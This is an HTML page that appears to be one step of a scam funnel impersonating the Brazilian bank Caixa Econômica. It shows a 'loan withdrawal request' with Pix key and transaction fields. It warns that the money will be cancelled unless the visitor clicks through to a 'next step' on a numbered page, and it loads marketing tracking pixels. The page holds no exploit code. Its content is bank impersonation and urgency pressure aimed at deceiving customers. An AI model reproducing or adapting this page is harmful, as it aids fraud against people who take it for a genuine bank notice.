﻿<!DOCTYPE html><html lang="pt-BR"><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica- Sua solicitação</title>
    
      

<script src="../scripts/utms/latest-8.js" data-utmify-prevent-subids="" async="" defer=""></script>


    
    <link rel="stylesheet" href="css/DkFwNvYWmFdg.css">
</head>

<body>
    <div class="container">
        <div class="header" style="background-color: white; padding: 18px; display: flex; justify-content: center;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>

        <div class="content">
            <h1>Sua solicitação</h1>

            <p class="subtitle">Confira os detalhes da sua solicitação</p>

            <div class="details-section">
                <div class="detail-group">
                    <h2>Empresa</h2>

                    <p>Caixa Econômica.</p>

                    <p class="detail-subtitle">CNPJ: 09.694.966/0001-40</p>
                </div>

                <div class="detail-row">
                    <div class="detail-group">
                        <h2>Data</h2>

                        <p id="requestDate"></p>
                    </div>

                    <div class="detail-group">
                        <h2>Horário</h2>

                        <p id="requestTime"></p>
                    </div>
                </div>

                <div class="detail-group">
                    <h2>Chave Pix</h2>

                    <p id="pixKeyDisplay"></p>
                </div>

                <div class="detail-group">
                    <h2>Código da Transação</h2>

                    <p id="transactionCode"></p>
                </div>

                <div class="detail-group">
                    <h2>Autenticação</h2>

                    <p id="authCode" class="auth-code"></p>
                </div>

                <div class="warning-box">
                    <div class="warning-icon">⚠</div>

                    <div class="warning-content">
                        <h3>ATENÇÃO!</h3>

                        <p>Ao fazer esta solicitação, você iniciará o processo de saque imediato do seu empréstimo. Caso não conclua a próxima etapa, entenderemos que você não deseja mais o valor, e ele será automaticamente cancelado.</p>

                        <p class="warning-note">OBS: Isso ocorrerá apenas se você não concluir a próxima etapa.</p>
                    </div>
                </div>

                <button class="continue-btn" onclick="redirectWithUTMs();">Próxima Etapa</button>
            </div>
        </div>

        <footer class="footer">
            <p>© 2025 Caixa Econômica - Todos os direitos reservados</p>

            <p>CNPJ: 09.694.966/0001-40</p>

            <p>Política de Privacidade</p>
        </footer>
    </div>

    <script src="js/xezLNhQbRphW.js"></script>

    <script>
        function redirectWithUTMs() {
            window.location.href = '../page-10' + window.location.search;
        }
    </script>



</body><!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>